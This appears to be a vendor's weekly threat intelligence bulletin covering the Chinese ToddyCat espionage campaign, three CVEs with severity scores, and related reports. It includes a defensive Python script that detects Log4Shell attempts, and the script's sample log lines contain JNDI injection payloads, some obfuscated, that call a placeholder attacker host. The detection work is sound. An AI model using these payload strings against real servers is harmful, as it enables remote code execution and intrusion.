The reporting this week focuses on widespread campaigns conducted by a Chinese espionage group which demonstrate China’s capabilities and continued interest in state-level political and military intelligence collection. The threat actor ToddyCat initially targeted Taiwanese and Vietnamese government and military organisations before expanding its campaign to include victims in Iran, India, Russia, and the United Kingdom, and later Indonesia, Uzbekistan, and Kyrgyzstan.

The group leveraged the widely exploited ProxyLogon vulnerabilities to compromise Microsoft Exchange servers and then deployed previously unseen espionage tools: the Samurai backdoor and the Ninja Trojan. We have recently reported on the Chinese nation-state groups GALLIUM and Aoqin Dragon conducting widespread espionage campaigns, and this latest incident reaffirms Beijing’s intent and capability to conduct pervasive intelligence collection operations against European and Asian targets.

Key Vulnerabilities

  1. CVE-2022-20664
    A vulnerability in the web management interface of Cisco Secure Email and Web Manager (CVSS: 7.7 | OVSS: 21) can allow a remote user to obtain sensitive information, including user credentials, from the external authentication server. However, exploitation requires valid operator-level (or higher) credentials.
  2. CVE-2021-44228
    The notorious Apache Log4j vulnerability (CVSS: 10 | OVSS: 100) continues to be leveraged by threat actors despite its discovery in December 2021; it allows users who control log messages or their parameters to execute arbitrary code. On this occasion, AvosLocker ransomware group affiliates used the vulnerability to compromise a vulnerable VMware Horizon server.
  3. CVE-2022-29499
    A vulnerability caused by incorrect data validation in the Service Appliance component of Mitel MiVoice Connect through 19.2 SP3 (CVSS: 9.8 | OVSS: 39) can allow a user to achieve remote code execution. Reports online suggest that ransomware groups are exploiting this vulnerability to gain initial access to victims’ networks.
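For the Log4j item above, a defender-side check added here (not code from the original report): it scans constructed web-server access log lines for the `${jndi:` lookup that CVE-2021-44228 abuses, after undoing URL-encoding and the nested-lookup obfuscations (`${lower:j}`, `${::-j}`) that scanners use to evade naive string matching. The sample log lines and the host `attacker.example` are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access log lines (not real traffic); attacker.example is a placeholder host.
SAMPLE_LOGS = [
    '203.0.113.7 - - [20/Jun/2022:10:01:22 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [20/Jun/2022:10:01:25 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example:1389/a}"',
    '203.0.113.9 - - [20/Jun/2022:10:01:31 +0000] "GET /?q=${${lower:j}ndi:rmi://attacker.example/b} HTTP/1.1" 400 0 "-" "curl/7.68.0"',
    '203.0.113.9 - - [20/Jun/2022:10:01:40 +0000] "GET / HTTP/1.1" 200 512 "-" "%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2Fattacker.example%2Fc%7D"',
    '198.51.100.4 - - [20/Jun/2022:10:02:00 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

# ${lower:X} / ${upper:X}: case-transform lookups used to hide the letters of "jndi".
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}")
# ${name:-X} (including ${::-X} and ${env:NOPE:-X}): the default-value form resolves to X.
DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")


def normalize_lookups(text: str) -> str:
    """URL-decode, resolve innermost obfuscating lookups until none remain, then case-fold.

    Only the case-transform and default-value forms are resolved; a ${jndi:...}
    lookup itself is left intact so that it can be matched afterwards.
    """
    text = unquote(text)
    previous = None
    while previous != text:  # each pass strips one nesting level; stops when nothing changes
        previous = text
        text = CASE_LOOKUP.sub(lambda m: m.group(1).lower(), text)
        text = DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text.lower()


def find_jndi_lookups(lines) -> list:
    """Return 1-based indices of log lines carrying a JNDI lookup after normalization."""
    return [i for i, line in enumerate(lines, 1) if "${jndi:" in normalize_lookups(line)]


if __name__ == "__main__":
    for i in find_jndi_lookups(SAMPLE_LOGS):
        print(f"line {i}: {SAMPLE_LOGS[i - 1]}")
```

The benign `${date:yyyy}` lookup on the last sample line is deliberately not flagged, so the check keys on the JNDI lookup rather than on any `${` sequence.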

Key Intelligence Reports

  1. Newly identified Chinese state unit ToddyCat exploits Microsoft Exchange servers to deliver custom espionage tools.
    Since December 2020, the newly identified state unit ToddyCat has targeted high-profile government and military entities in Europe and Asia to deliver two previously undocumented espionage tools: the Samurai backdoor and Ninja Trojan.
  2. Chinese espionage unit Tropic Trooper targets novice threat actors with infostealer and backdoor.
    For several years, the Chinese espionage unit Tropic Trooper has targeted script kiddies to deploy a novel loader labelled Nimbda and a new variant of the Yahoyah trojan.
  3. AvosLocker ransomware group exploits Log4Shell to compromise VMware Horizon servers.
    Affiliates of the AvosLocker ransomware-as-a-service gang have exploited a VMware Horizon server vulnerable to Log4Shell to deploy the gang’s payload.

What is OVSS?

The Orpheus Vulnerability Severity Score (OVSS) helps companies understand the risk associated with particular vulnerabilities. Orpheus does this by adding context on the likely threat to, and impact of, CVEs, building upon the vulnerability information provided by the CVSS (Common Vulnerability Scoring System) score.
